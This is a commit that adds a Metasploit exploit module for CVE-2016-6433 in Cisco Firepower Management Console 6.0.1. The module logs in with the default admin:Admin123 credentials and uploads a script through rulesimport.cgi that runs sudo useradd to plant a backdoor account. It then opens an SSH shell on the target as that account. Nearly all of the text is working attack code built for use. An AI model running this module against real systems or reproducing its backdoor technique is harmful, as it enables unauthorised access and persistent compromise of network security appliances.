Add CVE-2016-6433 Cisco Firepower Management Console UserAdd Exploit

wchen-r7 · wchen-r7 · commit e331066d6db9 · 2017-01-06T17:05:25.000-06:00
diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb
@@ -245,7 +245,7 @@ def set_via(opts)
   def set_from_exploit(m)
     self.via = { 'Exploit' => m.fullname }
     self.via['Payload'] = ('payload/' + m.datastore['PAYLOAD'].to_s) if m.datastore['PAYLOAD']
-    self.target_host = Rex::Socket.getaddress(m.target_host) if (m.target_host.to_s.strip.length > 0)
+    self.target_host = Rex::Socket.getaddress(m.target_host.address) if (m.target_host.to_s.strip.length > 0)
     self.target_port = m.target_port if (m.target_port.to_i != 0)
     self.workspace   = m.workspace
     self.username    = m.owner
diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb
@@ -0,0 +1,254 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Cisco Firepower Management Console.
+        The management system contains a configuration flaw that allows the www user to
+        execute the useradd binary, which can be abused to create backdoor accounts.
+        Authentication is required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Matt',  # Original discovery & PoC
+          'sinn3r' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-6433' ],
+          [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 10 2016',
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'DefaultOptions' =>
+        {
+          'SSL'        => 'true',
+          'SSLVersion' => 'Auto',
+          'RPORT'      => 443
+        },
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        # admin:Admin123 is the default credential for 6.0.1
+        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
+        OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
+        OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
+        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
+        OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
+      ], self.class)
+  end
+
+  def check
+  end
+
+  def get_sf_action_id(sid)
+    requirements = {}
+
+    print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
+
+    uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+      'cookie' => "CGISESSID=#{sid}"
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
+    end
+
+    sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
+
+    unless sf_action_id
+      fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
+    end
+
+    sf_action_id
+  end
+
+  def create_ssh_backdoor(sid, user, pass)
+    uri          = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+    sf_action_id = get_sf_action_id(sid)
+    sh_name      = "#{Rex::Text.rand_text_alpha(6)}.sh"
+
+    print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
+
+    mime_data = Rex::MIME::Message.new
+    mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
+    mime_data.add_part('file', nil, nil, 'form-data; name="source"')
+    mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
+    mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
+    mime_data.add_part(
+      "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
+      'application/octet-stream',
+      nil,
+      "form-data; name=\"file\"; filename=\"#{sh_name}\""
+    )
+
+    send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie'   => "CGISESSID=#{sid}",
+      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
+      'data'     => mime_data.to_s,
+      'vars_get' => { 'no_mojo' => '1' },
+    })
+  end
+
+  def generate_new_username
+    datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
+  end
+
+  def generate_new_password
+    datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'cisco',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def do_login
+    console_user = datastore['USERNAME']
+    console_pass = datastore['PASSWORD']
+    uri          = normalize_uri(target_uri.path, 'login.cgi')
+
+    print_status("Attempting to login in as #{console_user}:#{console_pass}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'username' => console_user,
+        'password' => console_pass,
+        'target'   => ''
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
+    end
+
+    res_cookie = res.get_cookies
+    if res.code == 302 && res_cookie.include?('CGISESSID')
+      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
+      print_status("CGI Session ID: #{cgi_sid}")
+      print_good("Authenticated as #{console_user}:#{console_pass}")
+      report_cred(username: console_user, password: console_pass)
+      return cgi_sid
+    end
+
+    nil
+  end
+
+  def get_ssh_session(user, pass)
+    print_status("Attempting to log into SSH as #{user}:#{pass}")
+
+    factory = ssh_socket_factory
+    opts = {
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: datastore['SSHPORT'],
+      use_agent: false,
+      config: false,
+      password: pass,
+      proxy: factory,
+      non_interactive: true
+    }
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError => e
+      print_error "SSH - #{e.message}"
+      return
+    rescue ::Timeout::Error
+      print_error "SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
+      print_error "SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      conn = ::Net::SSH::CommandStream.new(ssh, '/bin/bash', true)
+      ssh = nil
+      handler(conn.lsock)
+    end
+  end
+
+  def exploit
+    # To exploit the useradd vuln, we need to login first.
+    sid = do_login
+    return unless sid
+
+    # After login, we can call the useradd utility to create a backdoor user
+    new_user = generate_new_username
+    new_pass = generate_new_password
+    create_ssh_backdoor(sid, new_user, new_pass)
+
+    # Log into the SSH backdoor account
+    get_ssh_session(new_user, new_pass)
+  end
+
+end
